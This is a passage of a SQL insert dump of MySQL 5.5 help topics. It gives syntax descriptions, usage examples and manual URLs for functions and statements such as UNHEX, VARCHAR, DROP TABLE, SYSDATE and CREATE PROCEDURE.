indexes not being used when you believe that\nthey should be, run ANALYZE TABLE to update table statistics, such as\ncardinality of keys, that can affect the choices the optimizer makes.\nSee [HELP ANALYZE TABLE].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/explain.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/explain.html'),(257,'DEGREES',3,'Syntax:\nDEGREES(X)\n\nReturns the argument X, converted from radians to degrees.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT DEGREES(PI());\n -> 180\nmysql> SELECT DEGREES(PI() / 2);\n -> 90\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(258,'- UNARY',3,'Syntax:\n-\n\nUnary minus. This operator changes the sign of the operand.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html\n\n','mysql> SELECT - 2;\n -> -2\n','http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html'),(259,'VARCHAR',23,'[NATIONAL] VARCHAR(M) [CHARACTER SET charset_name] [COLLATE\ncollation_name]\n\nA variable-length string. M represents the maximum column length in\ncharacters. The range of M is 0 to 65,535. The effective maximum length\nof a VARCHAR is subject to the maximum row size (65,535 bytes, which is\nshared among all columns) and the character set used. For example, utf8\ncharacters can require up to three bytes per character, so a VARCHAR\ncolumn that uses the utf8 character set can be declared to be a maximum\nof 21,844 characters. See\nhttp://dev.mysql.com/doc/refman/5.5/en/column-count-limit.html.\n\nMySQL stores VARCHAR values as a 1-byte or 2-byte length prefix plus\ndata. The length prefix indicates the number of bytes in the value. A\nVARCHAR column uses one length byte if values require no more than 255\nbytes, two length bytes if values may require more than 255 bytes.\n\n*Note*: MySQL 5.5 follows the standard SQL specification, and does not\nremove trailing spaces from VARCHAR values.\n\nVARCHAR is shorthand for CHARACTER VARYING. NATIONAL VARCHAR is the\nstandard SQL way to define that a VARCHAR column should use some\npredefined character set. MySQL 4.1 and up uses utf8 as this predefined\ncharacter set.\nhttp://dev.mysql.com/doc/refman/5.5/en/charset-national.html. NVARCHAR\nis shorthand for NATIONAL VARCHAR.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(260,'UNHEX',38,'Syntax:\n\nUNHEX(str)\n\nFor a string argument str, UNHEX(str) interprets each pair of\ncharacters in the argument as a hexadecimal number and converts it to\nthe byte represented by the number. The return value is a binary\nstring.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT UNHEX(\'4D7953514C\');\n -> \'MySQL\'\nmysql> SELECT 0x4D7953514C;\n -> \'MySQL\'\nmysql> SELECT UNHEX(HEX(\'string\'));\n -> \'string\'\nmysql> SELECT HEX(UNHEX(\'1267\'));\n -> \'1267\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(261,'STD',16,'Syntax:\nSTD(expr)\n\nReturns the population standard deviation of expr. This is an extension\nto standard SQL. The standard SQL function STDDEV_POP() can be used\ninstead.\n\nThis function returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(262,'COS',3,'Syntax:\nCOS(X)\n\nReturns the cosine of X, where X is given in radians.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT COS(PI());\n -> -1\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(263,'DATE FUNCTION',32,'Syntax:\nDATE(expr)\n\nExtracts the date part of the date or datetime expression expr.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DATE(\'2003-12-31 01:02:03\');\n -> \'2003-12-31\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(264,'DROP TRIGGER',40,'Syntax:\nDROP TRIGGER [IF EXISTS] [schema_name.]trigger_name\n\nThis statement drops a trigger. The schema (database) name is optional.\nIf the schema is omitted, the trigger is dropped from the default\nschema. DROP TRIGGER requires the TRIGGER privilege for the table\nassociated with the trigger.\n\nUse IF EXISTS to prevent an error from occurring for a trigger that\ndoes not exist. A NOTE is generated for a nonexistent trigger when\nusing IF EXISTS. See [HELP SHOW WARNINGS].\n\nTriggers for a table are also dropped if you drop the table.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-trigger.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-trigger.html'),(265,'RESET MASTER',8,'Syntax:\nRESET MASTER\n\nDeletes all binary log files listed in the index file, resets the\nbinary log index file to be empty, and creates a new binary log file.\nThis statement is intended to be used only when the master is started\nfor the first time.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/reset-master.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/reset-master.html'),(266,'TAN',3,'Syntax:\nTAN(X)\n\nReturns the tangent of X, where X is given in radians.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT TAN(PI());\n -> -1.2246063538224e-16\nmysql> SELECT TAN(PI()+1);\n -> 1.5574077246549\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(267,'PI',3,'Syntax:\nPI()\n\nReturns the value of π (pi). The default number of decimal places\ndisplayed is seven, but MySQL uses the full double-precision value\ninternally.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT PI();\n -> 3.141593\nmysql> SELECT PI()+0.000000000000000000;\n -> 3.141592653589793116\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(268,'WEEKOFYEAR',32,'Syntax:\nWEEKOFYEAR(date)\n\nReturns the calendar week of the date as a number in the range from 1\nto 53. WEEKOFYEAR() is a compatibility function that is equivalent to\nWEEK(date,3).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT WEEKOFYEAR(\'2008-02-20\');\n -> 8\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(269,'/',3,'Syntax:\n/\n\nDivision:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html\n\n','mysql> SELECT 3/5;\n -> 0.60\n','http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html'),(270,'PURGE BINARY LOGS',8,'Syntax:\nPURGE { BINARY | MASTER } LOGS\n { TO \'log_name\' | BEFORE datetime_expr }\n\nThe binary log is a set of files that contain information about data\nmodifications made by the MySQL server. The log consists of a set of\nbinary log files, plus an index file (see\nhttp://dev.mysql.com/doc/refman/5.5/en/binary-log.html).\n\nThe PURGE BINARY LOGS statement deletes all the binary log files listed\nin the log index file prior to the specified log file name or date.\nBINARY and MASTER are synonyms. Deleted log files also are removed from\nthe list recorded in the index file, so that the given log file becomes\nthe first in the list.\n\nThis statement has no effect if the server was not started with the\n--log-bin option to enable binary logging.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/purge-binary-logs.html\n\n','PURGE BINARY LOGS TO \'mysql-bin.010\';\nPURGE BINARY LOGS BEFORE \'2008-04-02 22:46:26\';\n','http://dev.mysql.com/doc/refman/5.5/en/purge-binary-logs.html'),(271,'STDDEV_SAMP',16,'Syntax:\nSTDDEV_SAMP(expr)\n\nReturns the sample standard deviation of expr (the square root of\nVAR_SAMP().\n\nSTDDEV_SAMP() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(272,'SCHEMA',17,'Syntax:\nSCHEMA()\n\nThis function is a synonym for DATABASE().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(273,'MLINEFROMWKB',33,'MLineFromWKB(wkb[,srid]), MultiLineStringFromWKB(wkb[,srid])\n\nConstructs a MultiLineString value using its WKB representation and\nSRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(274,'LOG2',3,'Syntax:\nLOG2(X)\n\nReturns the base-2 logarithm of X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT LOG2(65536);\n -> 16\nmysql> SELECT LOG2(-100);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(275,'SUBTIME',32,'Syntax:\nSUBTIME(expr1,expr2)\n\nSUBTIME() returns expr1 − expr2 expressed as a value in the same\nformat as expr1. expr1 is a time or datetime expression, and expr2 is a\ntime expression.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT SUBTIME(\'2007-12-31 23:59:59.999999\',\'1 1:1:1.000002\');\n -> \'2007-12-30 22:58:58.999997\'\nmysql> SELECT SUBTIME(\'01:00:00.999999\', \'02:00:00.999998\');\n -> \'-00:59:59.999999\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(276,'UNCOMPRESSED_LENGTH',12,'Syntax:\nUNCOMPRESSED_LENGTH(compressed_string)\n\nReturns the length that the compressed string had before being\ncompressed.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT UNCOMPRESSED_LENGTH(COMPRESS(REPEAT(\'a\',30)));\n -> 30\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(277,'DROP TABLE',40,'Syntax:\nDROP [TEMPORARY] TABLE [IF EXISTS]\n tbl_name [, tbl_name] ...\n [RESTRICT | CASCADE]\n\nDROP TABLE removes one or more tables. You must have the DROP privilege\nfor each table. All table data and the table definition are removed, so\nbe careful with this statement! If any of the tables named in the\nargument list do not exist, MySQL returns an error indicating by name\nwhich nonexisting tables it was unable to drop, but it also drops all\nof the tables in the list that do exist.\n\n*Important*: When a table is dropped, user privileges on the table are\nnot automatically dropped. See [HELP GRANT].\n\nFor a partitioned table, DROP TABLE permanently removes the table\ndefinition, all of its partitions, and all of the data which was stored\nin those partitions. It also removes the partitioning definition (.par)\nfile associated with the dropped table.\n\nUse IF EXISTS to prevent an error from occurring for tables that do not\nexist. A NOTE is generated for each nonexistent table when using IF\nEXISTS. See [HELP SHOW WARNINGS].\n\nRESTRICT and CASCADE are permitted to make porting easier. In MySQL\n5.5, they do nothing.\n\n*Note*: DROP TABLE automatically commits the current active\ntransaction, unless you use the TEMPORARY keyword.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-table.html'),(278,'POW',3,'Syntax:\nPOW(X,Y)\n\nReturns the value of X raised to the power of Y.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT POW(2,2);\n -> 4\nmysql> SELECT POW(2,-2);\n -> 0.25\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(279,'SHOW CREATE TABLE',27,'Syntax:\nSHOW CREATE TABLE tbl_name\n\nShows the CREATE TABLE statement that creates the named table. To use\nthis statement, you must have some privilege for the table. This\nstatement also works with views.\nSHOW CREATE TABLE quotes table and column names according to the value\nof the sql_quote_show_create option. See\nhttp://dev.mysql.com/doc/refman/5.5/en/server-system-variables.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-create-table.html\n\n','mysql> SHOW CREATE TABLE t\\G\n*************************** 1. row ***************************\n Table: t\nCreate Table: CREATE TABLE `t` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `s` char(60) DEFAULT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1\n','http://dev.mysql.com/doc/refman/5.5/en/show-create-table.html'),(280,'DUAL',28,'You are permitted to specify DUAL as a dummy table name in situations\nwhere no tables are referenced:\n\nmysql> SELECT 1 + 1 FROM DUAL;\n -> 2\n\nDUAL is purely for the convenience of people who require that all\nSELECT statements should have FROM and possibly other clauses. MySQL\nmay ignore the clauses. MySQL does not require FROM DUAL if no tables\nare referenced.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/select.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/select.html'),(281,'INSTR',38,'Syntax:\nINSTR(str,substr)\n\nReturns the position of the first occurrence of substring substr in\nstring str. This is the same as the two-argument form of LOCATE(),\nexcept that the order of the arguments is reversed.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT INSTR(\'foobarbar\', \'bar\');\n -> 4\nmysql> SELECT INSTR(\'xbar\', \'foobar\');\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(282,'NOW',32,'Syntax:\nNOW()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS.uuuuuu format, depending on whether the function is\nused in a string or numeric context. The value is expressed in the\ncurrent time zone.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT NOW();\n -> \'2007-12-15 23:50:26\'\nmysql> SELECT NOW() + 0;\n -> 20071215235026.000000\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(283,'SHOW ENGINES',27,'Syntax:\nSHOW [STORAGE] ENGINES\n\nSHOW ENGINES displays status information about the server\'s storage\nengines. This is particularly useful for checking whether a storage\nengine is supported, or to see what the default engine is. This\ninformation can also be obtained from the INFORMATION_SCHEMA ENGINES\ntable. See http://dev.mysql.com/doc/refman/5.5/en/engines-table.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-engines.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-engines.html'),(284,'>=',20,'Syntax:\n>=\n\nGreater than or equal:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 2 >= 2;\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(285,'EXP',3,'Syntax:\nEXP(X)\n\nReturns the value of e (the base of natural logarithms) raised to the\npower of X. The inverse of this function is LOG() (using a single\nargument only) or LN().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT EXP(2);\n -> 7.3890560989307\nmysql> SELECT EXP(-2);\n -> 0.13533528323661\nmysql> SELECT EXP(0);\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(286,'LONGBLOB',23,'LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or 4GB (232 − 1)\nbytes. The effective maximum length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and\navailable memory. Each LONGBLOB value is stored using a 4-byte length\nprefix that indicates the number of bytes in the value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(287,'POINTN',13,'PointN(ls,N)\n\nReturns the N-th Point in the Linestring value ls. Points are numbered\nbeginning with 1.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html\n\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2));\n+-------------------------------------+\n| AsText(PointN(GeomFromText(@ls),2)) |\n+-------------------------------------+\n| POINT(2 2) |\n+-------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html'),(288,'YEAR DATA TYPE',23,'YEAR[(2|4)]\n\nA year in two-digit or four-digit format. The default is four-digit\nformat. YEAR(2) or YEAR(4) differ in display format, but have the same\nrange of values. In four-digit format, values display as 1901 to 2155,\nand 0000. In two-digit format, values display as 70 to 69, representing\nyears from 1970 to 2069. MySQL displays YEAR values in YYYY or YY\nformat, but permits assignment of values to YEAR columns using either\nstrings or numbers.\n\n*Note*: The YEAR(2) data type has certain issues that you should\nconsider before choosing to use it. As of MySQL 5.5.27, YEAR(2) is\ndeprecated. For more information, see\nhttp://dev.mysql.com/doc/refman/5.5/en/migrating-to-year4.html.\n\nFor additional information about YEAR display format and interpretation\nof input values, see http://dev.mysql.com/doc/refman/5.5/en/year.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html'),(289,'SUM',16,'Syntax:\nSUM([DISTINCT] expr)\n\nReturns the sum of expr. If the return set has no rows, SUM() returns\nNULL. The DISTINCT keyword can be used to sum only the distinct values\nof expr.\n\nSUM() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(290,'OCT',38,'Syntax:\nOCT(N)\n\nReturns a string representation of the octal value of N, where N is a\nlonglong (BIGINT) number. This is equivalent to CONV(N,10,8). Returns\nNULL if N is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT OCT(12);\n -> \'14\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(291,'SYSDATE',32,'Syntax:\nSYSDATE()\n\nReturns the current date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS.uuuuuu format, depending on whether the function is\nused in a string or numeric context.\n\nSYSDATE() returns the time at which it executes. This differs from the\nbehavior for NOW(), which returns a constant time that indicates the\ntime at which the statement began to execute. (Within a stored function\nor trigger, NOW() returns the time at which the function or triggering\nstatement began to execute.)\n\nmysql> SELECT NOW(), SLEEP(2), NOW();\n+---------------------+----------+---------------------+\n| NOW() | SLEEP(2) | NOW() |\n+---------------------+----------+---------------------+\n| 2006-04-12 13:47:36 | 0 | 2006-04-12 13:47:36 |\n+---------------------+----------+---------------------+\n\nmysql> SELECT SYSDATE(), SLEEP(2), SYSDATE();\n+---------------------+----------+---------------------+\n| SYSDATE() | SLEEP(2) | SYSDATE() |\n+---------------------+----------+---------------------+\n| 2006-04-12 13:47:44 | 0 | 2006-04-12 13:47:46 |\n+---------------------+----------+---------------------+\n\nIn addition, the SET TIMESTAMP statement affects the value returned by\nNOW() but not by SYSDATE(). This means that timestamp settings in the\nbinary log have no effect on invocations of SYSDATE().\n\nBecause SYSDATE() can return different values even within the same\nstatement, and is not affected by SET TIMESTAMP, it is nondeterministic\nand therefore unsafe for replication if statement-based binary logging\nis used. If that is a problem, you can use row-based logging.\n\nAlternatively, you can use the --sysdate-is-now option to cause\nSYSDATE() to be an alias for NOW(). This works if the option is used on\nboth the master and the slave.\n\nThe nondeterministic nature of SYSDATE() also means that indexes cannot\nbe used for evaluating expressions that refer to it.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(292,'UNINSTALL PLUGIN',5,'Syntax:\nUNINSTALL PLUGIN plugin_name\n\nThis statement removes an installed server plugin. It requires the\nDELETE privilege for the mysql.plugin table.\n\nplugin_name must be the name of some plugin that is listed in the\nmysql.plugin table. The server executes the plugin\'s deinitialization\nfunction and removes the row for the plugin from the mysql.plugin\ntable, so that subsequent server restarts will not load and initialize\nthe plugin. UNINSTALL PLUGIN does not remove the plugin\'s shared\nlibrary file.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/uninstall-plugin.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/uninstall-plugin.html'),(293,'ASBINARY',33,'AsBinary(g), AsWKB(g)\n\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-format-conversion-functions.html\n\n','SELECT AsBinary(g) FROM geom;\n','http://dev.mysql.com/doc/refman/5.5/en/gis-format-conversion-functions.html'),(294,'REPEAT FUNCTION',38,'Syntax:\nREPEAT(str,count)\n\nReturns a string consisting of the string str repeated count times. If\ncount is less than 1, returns an empty string. Returns NULL if str or\ncount are NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT REPEAT(\'MySQL\', 3);\n -> \'MySQLMySQLMySQL\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(295,'SHOW TABLES',27,'Syntax:\nSHOW [FULL] TABLES [{FROM | IN} db_name]\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW TABLES lists the non-TEMPORARY tables in a given database. You can\nalso get this list using the mysqlshow db_name command. The LIKE\nclause, if present, indicates which table names to match. The WHERE\nclause can be given to select rows using more general conditions, as\ndiscussed in http://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nMatching performed by the LIKE clause is dependent on the setting of\nthe lower_case_table_names system variable.\n\nThis statement also lists any views in the database. The FULL modifier\nis supported such that SHOW FULL TABLES displays a second output\ncolumn. Values for the second column are BASE TABLE for a table and\nVIEW for a view.\n\nIf you have no privileges for a base table or view, it does not show up\nin the output from SHOW TABLES or mysqlshow db_name.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-tables.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-tables.html'),(296,'MAKEDATE',32,'Syntax:\nMAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values. dayofyear must be\ngreater than 0 or the result is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT MAKEDATE(2011,31), MAKEDATE(2011,32);\n -> \'2011-01-31\', \'2011-02-01\'\nmysql> SELECT MAKEDATE(2011,365), MAKEDATE(2014,365);\n -> \'2011-12-31\', \'2014-12-31\'\nmysql> SELECT MAKEDATE(2011,0);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(297,'BINARY OPERATOR',38,'Syntax:\nBINARY\n\nThe BINARY operator casts the string following it to a binary string.\nThis is an easy way to force a column comparison to be done byte by\nbyte rather than character by character. This causes the comparison to\nbe case sensitive even if the column is not defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/cast-functions.html\n\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/cast-functions.html'),(298,'MBROVERLAPS',7,'MBROverlaps(g1,g2)\n\nReturns 1 or 0 to indicate whether the minimum bounding rectangles of\nthe two geometries g1 and g2 overlap. The term spatially overlaps is\nused if two geometries intersect and their intersection results in a\ngeometry of the same dimension but not equal to either of the given\ngeometries.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html'),(299,'SOUNDEX',38,'Syntax:\nSOUNDEX(str)\n\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get a\nstandard soundex string. All nonalphabetic characters in str are\nignored. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n\n*Important*: When using SOUNDEX(), you should be aware of the following\nlimitations:\n\no This function, as currently implemented, is intended to work well\n with strings that are in the English language only. Strings in other\n languages may not produce reliable results.\n\no This function is not guaranteed to provide consistent results with\n strings that use multibyte character sets, including utf-8.\n\n We hope to remove these limitations in a future release. See Bug\n #22638 for more information.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(300,'MBRTOUCHES',7,'MBRTouches(g1,g2)\n\nReturns 1 or 0 to indicate whether the minimum bounding rectangles of\nthe two geometries g1 and g2 touch. Two geometries spatially touch if\nthe interiors of the geometries do not intersect, but the boundary of\none of the geometries intersects either the boundary or the interior of\nthe other.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html'),(301,'DROP EVENT',40,'Syntax:\nDROP EVENT [IF EXISTS] event_name\n\nThis statement drops the event named event_name. The event immediately\nceases being active, and is deleted completely from the server.\n\nIf the event does not exist, the error ERROR 1517 (HY000): Unknown\nevent \'event_name\' results. You can override this and cause the\nstatement to generate a warning for nonexistent events instead using IF\nEXISTS.\n\nThis statement requires the EVENT privilege for the schema to which the\nevent to be dropped belongs.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-event.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-event.html'),(302,'INSERT SELECT',28,'Syntax:\nINSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows into a table\nfrom one or many tables. For example:\n\nINSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/insert-select.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/insert-select.html'),(303,'CREATE PROCEDURE',40,'Syntax:\nCREATE\n [DEFINER = { user | CURRENT_USER }]\n PROCEDURE sp_name ([proc_parameter[,...]])\n [characteristic ...] routine_body\n\nCREATE\n [DEFINER = { user | CURRENT_USER }]\n FUNCTION sp_name ([func_parameter[,...]])\n RETURNS type\n [characteristic ...] routine_body\n\nproc_parameter:\n [ IN | OUT | INOUT ] param_name type\n\nfunc_parameter:\n param_name type\n\ntype:\n Any valid MySQL data type\n\ncharacteristic:\n COMMENT \'string\'\n | LANGUAGE SQL\n | [NOT] DETERMINISTIC\n | { CONTAINS SQL | NO SQL | READS SQL DATA | MODIFIES SQL DATA }\n | SQL SECURITY { DEFINER | INVOKER }\n\nroutine_body:\n Valid SQL routine statement\n\nThese statements create stored routines. By default, a routine is\nassociated with the default database. To associate the routine\nexplicitly with a given database, specify the name as db_name.sp_name\nwhen you create it.\n\nThe CREATE FUNCTION statement is also used in MySQL to support UDFs\n(user-defined functions). See\nhttp://dev.mysql.com/doc/refman/5.5/en/adding-functions.html. A UDF can\nbe regarded as an external stored function. Stored functions share\ntheir namespace with UDFs. See\nhttp://dev.mysql.com/doc/refman/5.5/en/function-resolution.html, for\nthe rules describing how the server interprets references to different\nkinds of functions.\n\nTo invoke a stored procedure, use the CALL statement (see [HELP CALL]).\nTo invoke a stored function, refer to it in an expression. The function\nreturns a value during expression evaluation.\n\nCREATE PROCEDURE and CREATE FUNCTION require the CREATE ROUTINE\nprivilege. They might also require the SUPER privilege, depending on\nthe DEFINER value, as described later in this section. If binary\nlogging is enabled, CREATE FUNCTION might require the SUPER privilege,\nas described in\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-programs-logging.html.\n\nBy default, MySQL automatically grants the ALTER ROUTINE and EXECUTE\nprivileges to the routine creator. This behavior can be changed by\ndisabling the automatic_sp_privileges system variable. See\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-routines-privileges.html.\n\nThe DEFINER and SQL SECURITY clauses specify the security context to be\nused when checking access privileges at routine execution time, as\ndescribed later in this section.\n\nIf the routine name is the same as the name of a built-in SQL function,\na syntax error occurs unless you use a space between the name and the\nfollowing parenthesis when defining the routine or invoking it later.\nFor this reason, avoid using the names of existing SQL functions for\nyour own stored routines.\n\nThe IGNORE_SPACE SQL mode applies to built-in functions, not to stored\nroutines. It is always permissible to have spaces after a stored\nroutine name, regardless of whether IGNORE_SPACE is enabled.\n\nThe parameter list enclosed within parentheses must always be present.\nIf there are no parameters, an empty parameter list of () should be\nused. Parameter names are not case sensitive.\n\nEach parameter is an IN parameter by default. To specify otherwise for\na parameter, use the keyword OUT or INOUT before the parameter name.\n\n*Note*: Specifying a parameter as IN, OUT, or INOUT is valid only for a\nPROCEDURE. For a FUNCTION, parameters are always regarded as IN\nparameters.\n\nAn IN parameter passes a value into a procedure. The procedure might\nmodify the value, but the modification is not visible to the caller\nwhen the procedure returns. An OUT parameter passes a value from the\nprocedure back to the caller. Its initial value is NULL within the\nprocedure, and its value is visible to the caller when the procedure\nreturns. An INOUT parameter is initialized by the caller, can be\nmodified by the procedure, and any change made by the procedure is\nvisible to the caller when the procedure returns.\n\nFor each OUT or INOUT parameter, pass a user-defined variable in the\nCALL statement that invokes the procedure so that you can obtain its\nvalue when the procedure returns. If you are calling the procedure from\nwithin another stored procedure or function, you can also pass a\nroutine parameter or local routine variable as an IN or INOUT\nparameter.\n\nRoutine parameters cannot be referenced in statements prepared within\nthe routine; see\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-program-restrictions.html\n.\n\nThe following example shows a simple stored procedure that uses an OUT\nparameter:\n\nmysql> delimiter //\n\nmysql> CREATE PROCEDURE simpleproc (OUT param1 INT)\n -> BEGIN\n -> SELECT COUNT(*) INTO param1 FROM t;\n -> END//\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> delimiter ;\n\nmysql> CALL simpleproc(@a);\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT @a;\n+------+\n| @a |\n+------+\n| 3 |\n+------+\n1 row in set (0.00 sec)\n\nThe example uses the mysql client delimiter command to change 